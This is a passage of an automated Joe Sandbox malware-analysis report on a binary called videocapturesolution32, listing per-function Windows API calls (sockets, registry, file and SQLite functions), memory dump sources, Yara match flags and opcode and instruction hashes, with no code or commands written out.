                                                          • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02DB2D5C
                                                            • Part of subcall function 02DBA508: WSAGetLastError.WS2_32(00000000,?,?,02DB2A51), ref: 02DBA516
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$Send
                                                          • String ID:
                                                          • API String ID: 1282938840-0
                                                          • Opcode ID: a44a339a3a190a2b40f90b89a417e4d02b02591597c3cf7c363bd6396b5afcca
                                                          • Instruction ID: b6ee855352dd1336b80aa49cd04223aab1092c806dfe027a06e759530579a1ce
                                                          • Opcode Fuzzy Hash: a44a339a3a190a2b40f90b89a417e4d02b02591597c3cf7c363bd6396b5afcca
                                                          • Instruction Fuzzy Hash: EF0188B6500209EFD7219F54C8549ABFBEDFF45365F20496EE89A83300EB709D00CBA1
                                                          APIs
                                                          • WSASetLastError.WS2_32(00000000), ref: 02DB8406
                                                          • shutdown.WS2_32(?,00000002), ref: 02DB840F
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastshutdown
                                                          • String ID:
                                                          • API String ID: 1920494066-0
                                                          • Opcode ID: a7de4bf3b705f7999efb120144e2874728c43a810848ddcc022421f6fa76796f
                                                          • Instruction ID: 33eb806ff02b9b1a174e2b01e93df6a380ada5d4d7fdfc0d069a72a7bc6551de
                                                          • Opcode Fuzzy Hash: a7de4bf3b705f7999efb120144e2874728c43a810848ddcc022421f6fa76796f
                                                          • Instruction Fuzzy Hash: C6F09A71A04319CFD720AF68D420B9ABBEAFF08325F10885CE99697380D770AC00CBA1
                                                          APIs
                                                          • HeapCreate.KERNEL32(00000000,00001000,00000000,0040336F,00000000), ref: 00404465
                                                            • Part of subcall function 0040430C: GetVersionExA.KERNEL32 ref: 0040432B
                                                          • HeapDestroy.KERNEL32 ref: 004044A4
                                                            • Part of subcall function 0040482B: HeapAlloc.KERNEL32(00000000,00000140,0040448D,000003F8), ref: 00404838
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocCreateDestroyVersion
                                                          • String ID:
                                                          • API String ID: 2507506473-0
                                                          • Opcode ID: 86f647c1e17f9121db62508107f35f7b6bb1c87a2647d7f3c89694d97ca3aca0
                                                          • Instruction ID: 6792b556898a49359456169ba0c82f011abfeecbff717d74d0c7f117a7ac5838
                                                          • Opcode Fuzzy Hash: 86f647c1e17f9121db62508107f35f7b6bb1c87a2647d7f3c89694d97ca3aca0
                                                          • Instruction Fuzzy Hash: 90F065F0A01302DAEB206B70AE4572A3695DBC0755F20483BFA04F51E0EA788884A91D
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID:
                                                          • API String ID: 3356406503-0
                                                          • Opcode ID: 277dd47f19dd8218bdda12a47dc78fa2ac02a4f1b489ea0987e2fda3e0f0de4a
                                                          • Instruction ID: a16431466b0a979042936dd69ea8e6af87ee0a65c72e8a2ad2da1424c12da5ef
                                                          • Opcode Fuzzy Hash: 277dd47f19dd8218bdda12a47dc78fa2ac02a4f1b489ea0987e2fda3e0f0de4a
                                                          • Instruction Fuzzy Hash: DBC04C31A4C902DAEB141FF05F4CB293A706A087917625577D653F21E0DAFCDA09E62F
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 02DB511E
                                                            • Part of subcall function 02DB3D7E: htons.WS2_32(?), ref: 02DB3DA2
                                                            • Part of subcall function 02DB3D7E: htonl.WS2_32(00000000), ref: 02DB3DB9
                                                            • Part of subcall function 02DB3D7E: htonl.WS2_32(00000000), ref: 02DB3DC0
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: htonl$H_prologhtons
                                                          • String ID:
                                                          • API String ID: 4039807196-0
                                                          • Opcode ID: 5f9a839cea70d13b65b17977853b30e2301e9ab85e15ba0dbeb28319094f0e4f
                                                          • Instruction ID: 37d687289b2251ee730d152795aa4144a5cea7f03fd68951323ba7598e19c04a
                                                          • Opcode Fuzzy Hash: 5f9a839cea70d13b65b17977853b30e2301e9ab85e15ba0dbeb28319094f0e4f
                                                          • Instruction Fuzzy Hash: EB812675D0424ACECF06DFA8D0A0AEEBBB5EF08310F24815AD852B7340EA765A05CF70
                                                          APIs
                                                          • DeleteFileA.KERNEL32(5193289A,?,?,?), ref: 02E430F3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DEA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DEA000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2dea000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: DeleteFile
                                                          • String ID:
                                                          • API String ID: 4033686569-0
                                                          • Opcode ID: 1436e2c2cd006d6dd6450ccdee363d2038d2b47cd0793f19acdc30a5ae073239
                                                          • Instruction ID: 329c1cadd9a5e846995893bbc4bdd10528f9e00ff0a7cb26795365714ef7604b
                                                          • Opcode Fuzzy Hash: 1436e2c2cd006d6dd6450ccdee363d2038d2b47cd0793f19acdc30a5ae073239
                                                          • Instruction Fuzzy Hash: 90518CF260C200AFE705AF19DC8577ABBE5EFC8720F16892DE6C583644DA359851CB93
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 02DBE9C5
                                                            • Part of subcall function 02DB1A01: TlsGetValue.KERNEL32 ref: 02DB1A0A
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: H_prologValue
                                                          • String ID:
                                                          • API String ID: 3700342317-0
                                                          • Opcode ID: 1ba89f99200edc4089375c7f503be3c932cad7e39458aa53248e7242f1ae8b58
                                                          • Instruction ID: 5e1def9bde5c21bb63781e50ade26930678913e7f9d9abfe0c5e518c7823016e
                                                          • Opcode Fuzzy Hash: 1ba89f99200edc4089375c7f503be3c932cad7e39458aa53248e7242f1ae8b58
                                                          • Instruction Fuzzy Hash: AA212AB2904209EBDB01DFA4D850AEEBBF9FF49310F14412AE905A3340D774AE04CBA1
                                                          APIs
                                                          • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02DB33CC
                                                            • Part of subcall function 02DB32AB: __EH_prolog.LIBCMT ref: 02DB32B0
                                                            • Part of subcall function 02DB32AB: RtlEnterCriticalSection.NTDLL(?), ref: 02DB32C3
                                                            • Part of subcall function 02DB32AB: RtlLeaveCriticalSection.NTDLL(?), ref: 02DB32EF
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$CompareEnterExchangeH_prologInterlockedLeave
                                                          • String ID:
                                                          • API String ID: 1518410164-0
                                                          • Opcode ID: 84cb971155be98e5a4d70586feb0783f96b06319cd4d8fa55d8e03d1854a7f72
                                                          • Instruction ID: 82dcb644a860d744cc94f57f2af1bcb4b87f6240db16bbddbaafce1df195a311
                                                          • Opcode Fuzzy Hash: 84cb971155be98e5a4d70586feb0783f96b06319cd4d8fa55d8e03d1854a7f72
                                                          • Instruction Fuzzy Hash: 36016171614606EFD7059F59D895F95B7A9FF44320F508359E829873C0EB30EC11CBA0
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 02DBE555
                                                            • Part of subcall function 02DB26DB: RtlEnterCriticalSection.NTDLL(?), ref: 02DB2706
                                                            • Part of subcall function 02DB26DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02DB272B
                                                            • Part of subcall function 02DB26DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02DD5B53), ref: 02DB2738
                                                            • Part of subcall function 02DB26DB: SetWaitableTimer.KERNEL32(?,?,000493E0,00000000,00000000,00000000), ref: 02DB2778
                                                            • Part of subcall function 02DB26DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02DB27D9
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                          • String ID:
                                                          • API String ID: 4293676635-0
                                                          • Opcode ID: 7f5a2116da2096657be4c27394fa532539a9c347852fe77e0bf7cdb5b80cc4cf
                                                          • Instruction ID: ef40b3e9057608a81211704d3a22079659d64defebe63064b39585cb3d9c84ca
                                                          • Opcode Fuzzy Hash: 7f5a2116da2096657be4c27394fa532539a9c347852fe77e0bf7cdb5b80cc4cf
                                                          • Instruction Fuzzy Hash: 5801D0B5900B049FC718CF1AC540986FBF5EF88300B05C5AE944A8B721E770EA40CFA0
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 02DBE334
                                                            • Part of subcall function 02DC3B4C: _malloc.LIBCMT ref: 02DC3B64
                                                            • Part of subcall function 02DBE550: __EH_prolog.LIBCMT ref: 02DBE555
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: H_prolog$_malloc
                                                          • String ID:
                                                          • API String ID: 4254904621-0
                                                          • Opcode ID: b8c7bd9f2e950fe0d17794ce958ffef66634341d907d5bdfe6161b2e407ee468
                                                          • Instruction ID: 468fdfa08ff2ee0b0f4ff081c8af8779beddeea9eae68bef2893963621581c2f
                                                          • Opcode Fuzzy Hash: b8c7bd9f2e950fe0d17794ce958ffef66634341d907d5bdfe6161b2e407ee468
                                                          • Instruction Fuzzy Hash: A9E08671A00505ABCB09AF58D8107AE77A6DF04700F00456D740AD3340EB709D008AA4
                                                          APIs
                                                            • Part of subcall function 02DC5C5A: __getptd_noexit.LIBCMT ref: 02DC5C5B
                                                            • Part of subcall function 02DC5C5A: __amsg_exit.LIBCMT ref: 02DC5C68
                                                            • Part of subcall function 02DC3493: __getptd_noexit.LIBCMT ref: 02DC3497
                                                            • Part of subcall function 02DC3493: __freeptd.LIBCMT ref: 02DC34B1
                                                            • Part of subcall function 02DC3493: RtlExitUserThread.NTDLL(?,00000000,?,02DC3473,00000000), ref: 02DC34BA
                                                          • __XcptFilter.LIBCMT ref: 02DC347F
                                                            • Part of subcall function 02DC8D94: __getptd_noexit.LIBCMT ref: 02DC8D98
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                          • String ID:
                                                          • API String ID: 1405322794-0
                                                          • Opcode ID: 37dfe9e612bbd625d7132b6e976c7930712f80bb019458fc9087008cfed51e37
                                                          • Instruction ID: ed2cc37d7ff19bb4f5644855c3b8810c622df41fe0fd11582c675087628526cc
                                                          • Opcode Fuzzy Hash: 37dfe9e612bbd625d7132b6e976c7930712f80bb019458fc9087008cfed51e37
                                                          • Instruction Fuzzy Hash: 9DE0ECB19046029FEB09BBA0E949F6E7767EF44301F70008CE102AB361CA74AD41AF30
                                                          APIs
                                                          • RegSetValueExA.KERNEL32(?), ref: 0040D5F5
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID:
                                                          • API String ID: 3702945584-0
                                                          • Opcode ID: 9099fa02c714f848bbd02d8072e4723285eb0236fc9be135f6ccd2cd2f171e83
                                                          • Instruction ID: 5777e9539fe7069c3c3a6606f161a0f0b533806c357fc7b885ede7ae2e2cfc6c
                                                          • Opcode Fuzzy Hash: 9099fa02c714f848bbd02d8072e4723285eb0236fc9be135f6ccd2cd2f171e83
                                                          • Instruction Fuzzy Hash: 39C00230C04404E7CB091FD0AE444A97B31BB54304F2084B9E9A6704F08B364969AB1E
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: Open
                                                          • String ID:
                                                          • API String ID: 71445658-0
                                                          • Opcode ID: 0e711bc704396c0b22cd05a196d8437d68572cdcd1f13eed0043d5cc099e1119
                                                          • Instruction ID: 218edabd8dd696d45a8087cbd9c597a54f2c317aa48327a7766065f47fb863df
                                                          • Opcode Fuzzy Hash: 0e711bc704396c0b22cd05a196d8437d68572cdcd1f13eed0043d5cc099e1119
                                                          • Instruction Fuzzy Hash: CDC09B20E0C007DDD71449F54F4C57577746A14358B210D37E403F25C0E73C950D592D
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: ManagerOpen
                                                          • String ID:
                                                          • API String ID: 1889721586-0
                                                          • Opcode ID: 29ba3a24e4bec890e753a7e4b9f623943654ea44f34b8217b2794e1bc4aaeab9
                                                          • Instruction ID: 52fa0f959105af55ac4d5712e2ceda46e6c0f256708e39339f28e0edb6fe17aa
                                                          • Opcode Fuzzy Hash: 29ba3a24e4bec890e753a7e4b9f623943654ea44f34b8217b2794e1bc4aaeab9
                                                          • Instruction Fuzzy Hash: A2B09260C08001EAC7404FD08B4502C756299543153B4893B8603F11E4C638490EB62F
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: c1cdeaeea4258c792efe5fb026864d9e74fcae00eaac9439e4980c2efc13ff1d
                                                          • Instruction ID: 6e63e1bcfa3e42d27c1ddca8b2e33582374af5a0543867d43b90929a9494dd74
                                                          • Opcode Fuzzy Hash: c1cdeaeea4258c792efe5fb026864d9e74fcae00eaac9439e4980c2efc13ff1d
                                                          • Instruction Fuzzy Hash: E2B01234D00211CFC700CF78D9C47293BF4FF093407000639D446E2200DB7080068B15
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 660264d4f70c642cec2e7b839f50c3e9f1ad5c2d22ffca2aae86f62cd180f5b2
                                                          • Instruction ID: bc8702a845ed1fe3c455ad60fb255715fd4333b6e8192e99da2cd5c37d3eef04
                                                          • Opcode Fuzzy Hash: 660264d4f70c642cec2e7b839f50c3e9f1ad5c2d22ffca2aae86f62cd180f5b2
                                                          • Instruction Fuzzy Hash: 61B01230C4C800D6D60417D04B08A18363066043007204073D302300F086FC6405E70F
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: CopyFile
                                                          • String ID:
                                                          • API String ID: 1304948518-0
                                                          • Opcode ID: e57120d4a8d75c437ab6a4ec000401b33331d948b9baa6d59df9b8b998786019
                                                          • Instruction ID: 4b000064e1fe7eacd01680484530f0e83b34f3028c438890a2895f855ec7d3b0
                                                          • Opcode Fuzzy Hash: e57120d4a8d75c437ab6a4ec000401b33331d948b9baa6d59df9b8b998786019
                                                          • Instruction Fuzzy Hash: 92A00230654101DAE3401FA55B8CA153769A9257C1B168ABEA567F44E0DB78C049752E
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectory
                                                          • String ID:
                                                          • API String ID: 4241100979-0
                                                          • Opcode ID: 7dcec1a5f7b1a1abe3508412536c0f02cfc6921fb8e3fffcf0012a57333c1dc4
                                                          • Instruction ID: ad01798f9e439726e5dadaa5d296f4c640db8efc6943695f74ce3d6038b66cc9
                                                          • Opcode Fuzzy Hash: 7dcec1a5f7b1a1abe3508412536c0f02cfc6921fb8e3fffcf0012a57333c1dc4
                                                          • Instruction Fuzzy Hash: 3D900231148101D6D10016605B0D615253466147C176181376542B00D149FC0505961E
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 632515574f825f0fdc9dbf0e085098318565766e106f116b39747b4eb083fb8c
                                                          • Instruction ID: f1e8beb209ee07b2e5c7eac6325fb81dce942d9a1ed2a83f29e597e12d1c2f24
                                                          • Opcode Fuzzy Hash: 632515574f825f0fdc9dbf0e085098318565766e106f116b39747b4eb083fb8c
                                                          • Instruction Fuzzy Hash:
                                                          APIs
                                                            • Part of subcall function 02DC1610: OpenEventA.KERNEL32(00100002,00000000,00000000,2A7C0CD2), ref: 02DC16B0
                                                            • Part of subcall function 02DC1610: CloseHandle.KERNEL32(00000000), ref: 02DC16C5
                                                            • Part of subcall function 02DC1610: ResetEvent.KERNEL32(00000000,2A7C0CD2), ref: 02DC16CF
                                                            • Part of subcall function 02DC1610: CloseHandle.KERNEL32(00000000,2A7C0CD2), ref: 02DC1704
                                                          • TlsSetValue.KERNEL32(0000002A,?), ref: 02DC21AA
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEventHandle$OpenResetValue
                                                          • String ID:
                                                          • API String ID: 1556185888-0
                                                          • Opcode ID: daf45af46142c4b5c2d90be78f1a6316efb202bb717ca7880ca401da6622a276
                                                          • Instruction ID: 0a777796e1da149cf6fe480c4c72639cae8926c57d064c5ae190b72faa3f2ef8
                                                          • Opcode Fuzzy Hash: daf45af46142c4b5c2d90be78f1a6316efb202bb717ca7880ca401da6622a276
                                                          • Instruction Fuzzy Hash: 0F018F71A44614AFD700DF59DC05B6ABBA8EB05661F204B6AF825D3380D731AD148AA0
                                                          APIs
                                                          • VirtualAlloc.KERNEL32(00000000), ref: 0040282F
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 01f54d9328a05272e63064dbb5b49af2a2ed6932e4d2a174a73570825e3b3f31
                                                          • Instruction ID: ea9a56ab6284ba84832df852bcd7f3009bc77562dd5ea332e7782f9745e7c436
                                                          • Opcode Fuzzy Hash: 01f54d9328a05272e63064dbb5b49af2a2ed6932e4d2a174a73570825e3b3f31
                                                          • Instruction Fuzzy Hash: A6C08071C04136EFD3101F914D44B3AB7E49704705F110036A906B71C0C5791C1AA7ED
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 4a2e18cc123eb16d3587cf7227ac582d5eab6588c0e7def217d9d443f250490d
                                                          • Instruction ID: e0c428883a2a12bdb93c99ada1d3ad200100a4f8308c712f72c263f0bd5242a8
                                                          • Opcode Fuzzy Hash: 4a2e18cc123eb16d3587cf7227ac582d5eab6588c0e7def217d9d443f250490d
                                                          • Instruction Fuzzy Hash: ACB01231D8C701D6C60407E06F0CB6079207301300F204077AB8B700E0C73A044E7A0F
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: lstrcmpi
                                                          • String ID:
                                                          • API String ID: 1586166983-0
                                                          • Opcode ID: 5d8c512e8c19c32e2b6bcdcf3147c5e97626fc142be2b5fdb1928d9357119c32
                                                          • Instruction ID: 0c5d6521be4535ac0616f5b86e1e40f398a1ae352c1e0fc6d394022d828364cf
                                                          • Opcode Fuzzy Hash: 5d8c512e8c19c32e2b6bcdcf3147c5e97626fc142be2b5fdb1928d9357119c32
                                                          • Instruction Fuzzy Hash: 52900220648101DEF2000B725E0821529986604641312483D6443E0150DA78C0099529
                                                          APIs
                                                          • sqlite3_malloc.SQLITE3 ref: 609674C6
                                                            • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                            • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                            • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                            • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                          • sqlite3_step.SQLITE3 ref: 6096755A
                                                          • sqlite3_malloc.SQLITE3 ref: 6096783A
                                                          • sqlite3_bind_int64.SQLITE3 ref: 609678A8
                                                          • sqlite3_column_bytes.SQLITE3 ref: 609678E8
                                                          • sqlite3_column_blob.SQLITE3 ref: 60967901
                                                          • sqlite3_column_int64.SQLITE3 ref: 6096791A
                                                          • sqlite3_column_int64.SQLITE3 ref: 60967931
                                                          • sqlite3_column_int64.SQLITE3 ref: 60967950
                                                          • sqlite3_step.SQLITE3 ref: 609679C3
                                                          • sqlite3_bind_int64.SQLITE3 ref: 60967AA9
                                                          • sqlite3_step.SQLITE3 ref: 60967AB4
                                                          • sqlite3_column_int.SQLITE3 ref: 60967AC7
                                                          • sqlite3_reset.SQLITE3 ref: 60967AD4
                                                          • sqlite3_bind_int.SQLITE3 ref: 60967B89
                                                          • sqlite3_step.SQLITE3 ref: 60967B94
                                                          • sqlite3_column_int64.SQLITE3 ref: 60967BB0
                                                          • sqlite3_column_int64.SQLITE3 ref: 60967BCF
                                                          • sqlite3_column_int64.SQLITE3 ref: 60967BE6
                                                          • sqlite3_column_bytes.SQLITE3 ref: 60967C05
                                                          • sqlite3_column_blob.SQLITE3 ref: 60967C1E
                                                            • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED50
                                                          • sqlite3_bind_int64.SQLITE3 ref: 60967C72
                                                          • sqlite3_step.SQLITE3 ref: 60967C7D
                                                          • memcmp.MSVCRT ref: 60967D4C
                                                          • sqlite3_free.SQLITE3 ref: 60967D69
                                                          • sqlite3_free.SQLITE3 ref: 60967D74
                                                          • sqlite3_free.SQLITE3 ref: 60967FF7
                                                          • sqlite3_free.SQLITE3 ref: 60968002
                                                            • Part of subcall function 609634F0: sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                            • Part of subcall function 609634F0: sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                            • Part of subcall function 609634F0: sqlite3_malloc.SQLITE3 ref: 609635BB
                                                            • Part of subcall function 609634F0: sqlite3_blob_read.SQLITE3 ref: 60963602
                                                            • Part of subcall function 609634F0: sqlite3_free.SQLITE3 ref: 60963621
                                                          • sqlite3_reset.SQLITE3 ref: 60967C93
                                                            • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                            • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                          • sqlite3_reset.SQLITE3 ref: 60967CA7
                                                          • sqlite3_reset.SQLITE3 ref: 60968035
                                                          • sqlite3_bind_int64.SQLITE3 ref: 60967B72
                                                            • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                          • sqlite3_bind_int64.SQLITE3 ref: 6096809D
                                                          • sqlite3_bind_int64.SQLITE3 ref: 609680C6
                                                          • sqlite3_step.SQLITE3 ref: 609680D1
                                                          • sqlite3_column_int.SQLITE3 ref: 609680F3
                                                          • sqlite3_reset.SQLITE3 ref: 60968104
                                                          • sqlite3_step.SQLITE3 ref: 60968139
                                                          • sqlite3_column_int64.SQLITE3 ref: 60968151
                                                          • sqlite3_reset.SQLITE3 ref: 6096818A
                                                            • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED2B
                                                            • Part of subcall function 6095ECA6: sqlite3_bind_value.SQLITE3 ref: 6095EDDF
                                                          • sqlite3_reset.SQLITE3 ref: 609679E9
                                                            • Part of subcall function 609160CD: sqlite3_realloc.SQLITE3 ref: 609160EF
